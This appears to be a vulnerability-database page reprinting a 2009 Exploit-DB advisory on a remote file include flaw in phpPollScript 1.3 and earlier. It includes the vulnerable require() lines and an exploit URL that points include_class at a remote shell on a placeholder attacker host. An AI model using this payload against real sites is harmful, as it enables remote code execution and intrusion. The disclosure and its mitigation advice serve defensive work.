phpPollScript - exploit.company

vendor:

phpPollScript

by:

cr4wl3r

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: phpPollScript

Affected Version From: 1.3 and earlier

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

phpPollScript <= 1.3 Remote File Include Vulnerability

A vulnerability exists in phpPollScript version 1.3 and earlier, which allows a remote attacker to include arbitrary files on the vulnerable system. This is due to the 'include_class' parameter in 'init.poll.php' not being properly sanitized before being used in a 'require' function call. An attacker can exploit this vulnerability to include arbitrary files from remote hosts, which can lead to the execution of arbitrary PHP code on the vulnerable system.

Mitigation:

Upgrade to the latest version of phpPollScript or apply the patch from the vendor.

Source

Exploit-DB raw data:

########################################################################
#phpPollScript <= 1.3 Remote File Include Vulnerability
#Download Script      :  http://download.tomex.org/phpPollScriptv13b.zip
#Author               :  cr4wl3r 
#Contact              :  cr4wl3r[4t]linuxmail[dot]org 
#Location             :  Gorontalo - INDONESIA
########################################################################
#file :
#  init.poll.php
# line 2 $inc_path = dirname($include_class);
# line 3 require ($inc_path."/voting.poll.php");
########################################################################
#3xplo!t :
#http://target.com/[path]/php/init.poll.php?include_class=http://attacker.com/shell.txt/test/
########################################################################
#Greetz        : MyMom [alm]
#Thanks 2      : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral
########################################################################
#sekuritionline.net (all crew sekuritionline)
#manadocoding.net (all crew manadocoding)
########################################################################

# milw0rm.com [2009-09-16]